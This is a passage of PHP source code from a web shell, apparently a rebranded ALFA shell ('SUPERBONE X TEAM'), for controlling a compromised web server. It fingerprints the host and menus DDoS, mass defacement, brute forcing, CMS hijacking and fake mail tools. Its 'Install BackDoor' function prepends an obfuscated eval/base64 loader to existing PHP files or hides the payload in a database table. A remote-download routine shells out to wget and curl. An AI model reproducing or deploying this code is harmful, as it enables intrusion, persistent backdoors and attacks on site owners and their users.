  1634. if(typeof normal != "undefined" || post_encryption_mode == false){
  1635. return window.btoa(unescape(encodeURIComponent(a)));
  1636. }
  1637. return encrypt(a, "'._AlfaSecretKey().'");
  1638. }
  1639. function evalCss(jcss){
  1640. var style = document.createElement("style");
  1641. if (style.styleSheet) {
  1642. style.styleSheet.cssText = jcss;
  1643. } else {
  1644. style.appendChild(document.createTextNode(jcss));
  1645. }
  1646. d.getElementsByTagName("head")[0].appendChild(style);
  1647. }
  1648. function colorHandlerKey(el){
  1649. setTimeout(function(e){
  1650. colorHandler(el);
  1651. }, 200);
  1652. }
  1653. function colorHandler(el){
  1654. var target = el.getAttribute("target");
  1655. var multi = el.getAttribute("multi");
  1656. var ishover = target.indexOf(":hover");
  1657. if(multi){
  1658. var array = JSON.parse(atob(multi));
  1659. var jcss = "";
  1660. for(i in array.multi_selector){
  1661. jcss += i + "{"+array.multi_selector[i].replace(/{color}/g, el.value)+"}";
  1662. }
  1663. evalCss(jcss);
  1664. }
  1665. if(ishover != -1 && !multi){
  1666. $("input_" + target.replace(".","")).value = el.value;
  1667. $("gui_" + target.replace(".","")).value = el.value;
  1668. var css = target+"{color: "+el.value+";}";
  1669. evalCss(css);
  1670. }else{
  1671. $("input_" + target.replace(".","")).value = el.value;
  1672. $("gui_" + target.replace(".","")).value = el.value;
  1673. if(target == ".header_values"){
  1674. target = ".header,.header_values";
  1675. }
  1676. d.querySelectorAll(target).forEach(function(e){
  1677. e.style.color = el.value;
  1678. });
  1679. }
  1680. }
  1681. function importConfig(event){
  1682. var input = event.target;
  1683. var reader = new FileReader();
  1684. reader.onload = function(){
  1685. var data = reader.result;
  1686. try{
  1687. var conf = JSON.parse(data);
  1688. reloadColors(conf);
  1689. }catch(e){
  1690. alert("Config is invalid...!");
  1691. }
  1692. $("importFileBtn").value = "";
  1693. };
  1694. reader.readAsText(input.files[0]);
  1695. }
  1696. function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == "checkbox"){d.files.elements[i].checked = d.files.elements[0].checked;}}}
  1697. function path_history(pos){
  1698. _Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan", e);},true);
  1699. }
  1700. function runcgi(lang){
  1701. if(cgi_is_minimized && cgi_lang == lang){
  1702. showEditor("cgiloader");
  1703. return false;
  1704. }
  1705. _Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(lang)+"&ajax="+alfab64("true"),function(e){
  1706. d.body.style.overflow = "hidden";
  1707. $("cgiloader").style.display = "block";
  1708. $("cgiframe").innerHTML = e;
  1709. cgi_lang = lang;
  1710. if(cgi_is_minimized){
  1711. $("cgiloader-minimized").setAttribute("class", "minimized-hide");
  1712. setTimeout(function(){
  1713. $("cgiloader").removeAttribute("class");
  1714. if(is_minimized){
  1715. $("editor-minimized").style.top = "30%";
  1716. }
  1717. }, 1000);
  1718. }
  1719. });
  1720. }
  1721. ';
  1722. echo "</script>
  1723. <form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
  1724. <input type='hidden' name='a' value='dlfile'>
  1725. <input type='hidden' name='c' value=''>
  1726. <input type='hidden' name='file' value=''>
  1727. </form>
  1728. <input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
  1729. <img id='a_loader' src='".__showicon('loader')."'>";
  1730. $cmd_uname = alfaEx("uname -a",false,false);
  1731. $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
  1732. if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
  1733. echo '
  1734. </head>
  1735. <body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
  1736. <div id="up_bar"></div>
  1737. <div class="whole">
  1738. <form method="post" name="mf" style="display:none;">
  1739. <input type="hidden" name="a">
  1740. <input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
  1741. for($s=1;$s<=10;$s++){
  1742. echo '<input type="hidden" name="alfa'.$s.'">';
  1743. }
  1744. echo '<input type="hidden" name="charset">
  1745. </form>
  1746. <div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
  1747. <div class="header"><table width="100%" border="0">
  1748. <tr>
  1749. <td width="3%"><span class="header_vars">Uname:</span></td>
  1750. <td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
  1751. </tr>
  1752. <tr>
  1753. <td><span class="header_vars">User:</span></td>
  1754. <td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ']</span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
  1755. <td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="https://superbone.team/assets/superbon.png" /></td>
  1756. </tr>
  1757. <tr>
  1758. <td><span class="header_vars">PHP:</span></td>
  1759. <td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
  1760. </tr>
  1761. <tr>
  1762. <td><span class="header_vars">ServerIP:</span></td>
  1763. <td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>
  1764. </tr>
  1765. <tr>
  1766. <td width="3%"><span class="header_vars">DateTime:</span></td>
  1767. <td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
  1768. </tr>
  1769. <tr>
  1770. <td><span class="header_vars">Domains:</span></td>
  1771. <td width="76%"><span class="header_values" id="header_domains">';
  1772. if($GLOBALS['sys']=='unix'){
  1773. $d0mains = _alfa_file("/etc/named.conf",false);
  1774. if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
  1775. $count=0;
  1776. foreach($d0mains as $d0main){
  1777. if(@strstr($d0main,"zone")){
  1778. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1779. flush();
  1780. if(strlen(trim($domains[1][0])) > 2){
  1781. flush();
  1782. $count++;}}}
  1783. echo "$count Domains";}}
  1784. else{echo("Cant Read [ /etc/named.conf ]");}
  1785. echo '</span></td>
  1786. </tr>
  1787. <tr>
  1788. <td height="16"><span class="header_vars">HDD:</span></td>
  1789. <td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
  1790. </tr>';
  1791. if($GLOBALS['sys']=='unix'){
  1792. $useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
  1793. if(!@ini_get('safe_mode')){
  1794. if(strlen(alfaEx("id",false,false))>0){
  1795. echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
  1796. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
  1797. $x=0;
  1798. foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
  1799. if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
  1800. echo '</td>
  1801. </tr>
  1802. <tr>
  1803. <td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
  1804. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1805. $x=0;
  1806. foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
  1807. if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
  1808. echo '</td>
  1809. </tr>';
  1810. }else{
  1811. echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
  1812. }
  1813. }else{
  1814. echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
  1815. }
  1816. }else{
  1817. echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
  1818. echo alfaEx('ver',false,false);
  1819. echo '</td>
  1820. </tr> <tr>
  1821. <td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
  1822. </tr></b>';
  1823. }
  1824. $quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
  1825. echo '<tr>
  1826. <td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
  1827. </tr>
  1828. <tr>
  1829. <td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">SUPERBONE X TEAM</font></span></a></center></td>
  1830. </tr>
  1831. <tr>
  1832. <td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
  1833. </tr>
  1834. <tr>
  1835. <td height="11"><span class="header_vars">SoftWare: </span></td>
  1836. <td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
  1837. </tr>';
  1838. if($GLOBALS['sys']=="win"){
  1839. echo '<tr>
  1840. <td height="12"><span class="header_vars">DRIVE:</span></td>
  1841. <td colspan="2"><b>'.$drives.'</b></td>
  1842. </tr>';
  1843. }
  1844. echo '<tr>
  1845. <td height="12"><span class="header_vars">PWD:</span></td>
  1846. <td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ BACK ]</span></a></td>
  1847. </tr>
  1848. </table>
  1849. </div>
  1850. <div id="meunlist">
  1851. <ul>
  1852. ';
  1853. $li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2',
  1854. 'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
  1855. 'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
  1856. 'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher',
  1857. 'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<span class="alfa_plus">Alfa +</font>','selfrm'=>'Remove Shell'
  1858. );
  1859. foreach($li as $key=>$value){
  1860. echo('<li><a href="javascript:void(0);" class="menu_options" onclick="g(\''.$key.'\',null,\'\',\'\',\'\');">'.$value.'</a></li>'."\n");
  1861. }
  1862. if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass']))
  1863. echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';
  1864. else
  1865. echo '</ul></div>';}else{
  1866. @error_reporting(E_ALL ^ E_NOTICE);
  1867. @ini_set('error_log',NULL);
  1868. @ini_set('log_errors',0);
  1869. @ini_set('max_execution_time',0);
  1870. @ini_set('magic_quotes_runtime', 0);
  1871. @set_time_limit(0);
  1872. }}
  1873. function alfalogout(){
  1874. unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);
  1875. echo("<center><font color='red'>Logout...</font></center>");
  1876. }
  1877. function showAnimation($name){
  1878. return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
  1879. }
  1880. function __showicon($r){
  1881. $s['btn']='http://solevisible.com/images/btn.png';
  1882. $s['alfamini']='http://solevisible.com/images/alfamini.png';
  1883. $s['loader']='http://solevisible.com/images/loader.png';
  1884. //return 'data:image/png;base64,'.__get_resource($s[$r]);
  1885. return $s[$r];
  1886. }
  1887. function alfainbackdoor(){
  1888. alfahead();
  1889. echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File |</a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
  1890. $error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
  1891. $success= '<font color="green">Success...!';
  1892. $textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
  1893. $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
  1894. $cwd = 'Example: /home/alfa/public_html/index.php';
  1895. if($_POST['alfa1']=='file'){
  1896. echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
  1897. if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
  1898. $method = $_POST['alfa2'];
  1899. $file = $_POST['alfa3'];
  1900. $shell = $_POST['alfa4'];
  1901. $key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
  1902. if($key=='')$key='alfa';
  1903. if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
  1904. $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
  1905. if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
  1906. if($_POST['alfa1']=='db'){
  1907. echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
  1908. $table = array('td1' =>
  1909. array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  1910. 'td2' =>
  1911. array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  1912. 'td3' =>
  1913. array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  1914. 'td4' =>
  1915. array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  1916. 'td5' =>
  1917. array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
  1918. 'td6' =>
  1919. array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
  1920. );
  1921. create_table($table);
  1922. echo("<p>{$select}</p>");
  1923. echo($textarea);
  1924. echo("<p><input type='submit' value=' '></p></form></p></center>");
  1925. if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
  1926. $dbhost = $_POST['alfa2'];
  1927. $dbuser = $_POST['alfa3'];
  1928. $dbpw = $_POST['alfa4'];
  1929. $dbname = $_POST['alfa5'];
  1930. $file = $_POST['alfa6'];
  1931. $method = $_POST['alfa7'];
  1932. $shell = $_POST['alfa8'];
  1933. $key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
  1934. if($key=='')$key='alfa';
  1935. if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
  1936. if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
  1937. $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
  1938. if(@is_file($file)&&@is_writable($file)){
  1939. @mysqli_query($conn,'DROP TABLE `alfa_bc`');
  1940. @mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
  1941. @mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
  1942. @file_put_contents($file,$code."\n".@file_get_contents($file));
  1943. __alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
  1944. echo('</div>');
  1945. alfafooter();
  1946. }
  1947. function alfawhois(){
  1948. echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
  1949. if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
  1950. $site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
  1951. $target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
  1952. $data = @file_get_contents($target);
  1953. if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
  1954. $target = @json_decode($data,true);
  1955. echo __pre();
  1956. if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
  1957. echo("</div>");
  1958. }
  1959. function alfaremotedl(){
  1960. alfahead();
  1961. echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
  1962. <form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
  1963. <p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>
  1964. <div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
  1965. </form></p></center>");
  1966. if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
  1967. echo __pre();
  1968. $url = $_POST['alfa1'];
  1969. $path = $_POST['alfa2'];
  1970. echo('<center>');
  1971. if(__download($url,$path)){
  1972. echo('<font color="green">Success...!</font>');
  1973. }else{
  1974. echo('<font color="red">Error...!</font>');
  1975. }
  1976. echo('</center>');
  1977. }
  1978. echo("</div>");
  1979. alfafooter();
  1980. }
  1981. function __download($url,$path=false){
  1982. if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
  1983. $saveas = basename(rawurldecode($url));
  1984. if($path){$saveas=$path.$saveas;}
  1985. if($content = __read_file($url)){
  1986. if(@is_file($saveas))@unlink($saveas);
  1987. if(__write_file($saveas, $content)){return true;}}
  1988. $buff = alfaEx("wget ".$url." -O ".$saveas);
  1989. if(@is_file($saveas)) return true;
  1990. $buff = alfaEx("curl ".$url." -o ".$saveas);
  1991. if(@is_file($saveas)) return true;
  1992. $buff = alfaEx("lwp-download ".$url." ".$saveas);
  1993. if(@is_file($saveas)) return true;
  1994. $buff = alfaEx("lynx -source ".$url." > ".$saveas);
  1995. if(@is_file($saveas)) return true;
  1996. $buff = alfaEx("GET ".$url." > ".$saveas);
  1997. if(@is_file($saveas)) return true;
  1998. $buff = alfaEx("links -source ".$url." > ".$saveas);
  1999. if(@is_file($saveas)) return true;
  2000. $buff = alfaEx("fetch -o ".$saveas." -p ".$url);
  2001. if(@is_file($saveas)) return true;
  2002. return false;
  2003. }
  2004. function clean_string($string){
  2005. if(function_exists("iconv")){
  2006. $s = trim($string);
  2007. $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
  2008. }
  2009. return $s;
  2010. }
  2011. function __read_file($file, $boom = true){
  2012. $content = false;
  2013. if($fh = @fopen($file, "rb")){
  2014. $content = "";
  2015. while(!feof($fh)){
  2016. $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
  2017. }
  2018. }
  2019. if(empty($content)||!$content){
  2020. $content = alfaEx("cat '".addslashes($file)."'");
  2021. }
  2022. return $content;
  2023. }
  2024. function alfaSettings(){
  2025. alfahead();
  2026. AlfaNum(6,7,8,9,10);
  2027. echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';
  2028. if($_POST["alfa8"] == "main"){
  2029. echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
  2030. $lg_array = array('0'=>'No','1'=>'Yes');
  2031. $penc_array = array('false'=>'No','true'=>'Yes');
  2032. $protect_html = "";
  2033. $icon_html = "";
  2034. $postEnc_html = "";
  2035. $login_html = "";
  2036. foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
  2037. foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
  2038. foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
  2039. $lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
  2040. foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
  2041. echo '';
  2042. echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
  2043. if($_POST['alfa5']=='>>'){
  2044. echo __pre();
  2045. if(!empty($_POST['alfa3'])){
  2046. $protect = $_POST['alfa1'];
  2047. $lgpage = $_POST['alfa2'];
  2048. $username = $_POST['alfa3'];
  2049. $password = md5($_POST['alfa4']);
  2050. $icon = $_POST['alfa6'];
  2051. $post_encrypt = $_POST['alfa7'];
  2052. @chdir($GLOBALS['home_cwd']);
  2053. $basename = @basename($_SERVER['PHP_SELF']);
  2054. $data = @file_get_contents($basename);
  2055. $find_user = '/\'user\'(.*?),/i';
  2056. $find_pw = '/\'pass\'(.*?),/i';
  2057. $find_lg = '/\'login_page\'(.*?),/i';
  2058. $find_p = '/\'safemode\'(.*?),/i';
  2059. $icons = '/\'show_icons\'(.*?),/i';
  2060. $postEnc = '/\'post_encryption\'(.*?),/i';
  2061. if(!empty($username)&&preg_match($find_user,$data,$e)){
  2062. $new = '\'user\' => \''.$username.'\',';
  2063. $data = str_replace($e[0],$new,$data);
  2064. }
  2065. if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
  2066. $new = '\'pass\' => \''.$password.'\',';
  2067. $data = str_replace($e[0],$new,$data);
  2068. }
  2069. if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
  2070. $new = '\'login_page\' => \''.$lgpage.'\',';
  2071. $data = str_replace($e[0],$new,$data);
  2072. }
  2073. if(!empty($find_p)&&preg_match($find_p,$data,$e)){
  2074. $new = '\'safemode\' => \''.$protect.'\',';
  2075. $data = str_replace($e[0],$new,$data);
  2076. }
  2077. if(preg_match($icons,$data,$e)){
  2078. $new = '\'show_icons\' => \''.$icon.'\',';
  2079. $data = str_replace($e[0],$new,$data);
  2080. }
  2081. if(preg_match($postEnc,$data,$e)){
  2082. $new = '\'post_encryption\' => '.$post_encrypt.',';
  2083. $data = str_replace($e[0],$new,$data);
  2084. }
  2085. if(@file_put_contents($basename,$data)){
  2086. echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
  2087. }else{
  2088. __alert("<span style='color:red;'>File has no edit access...!</span>");
  2089. }
  2090. }else{
  2091. __alert("<span style='color:red;'>UserName is Empty !</span>");
  2092. }
  2093. }
  2094. }elseif($_POST["alfa8"] == "color"){
  2095. echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
  2096. echo '<table border="1"><tbody>';
  2097. $template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
  2098. $x = 1;
  2099. foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
  2100. $multi = "";
  2101. if(is_array($value)){
  2102. if(isset($value["multi_selector"])){
  2103. $multi = __ZW5jb2Rlcg(json_encode($value));
  2104. }
  2105. }
  2106. $value = alfa_getColor($key);
  2107. $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
  2108. echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
  2109. }
  2110. echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
